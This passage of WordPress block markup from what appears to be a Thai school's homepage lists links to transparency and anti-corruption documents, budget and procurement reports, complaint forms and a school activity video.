{\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 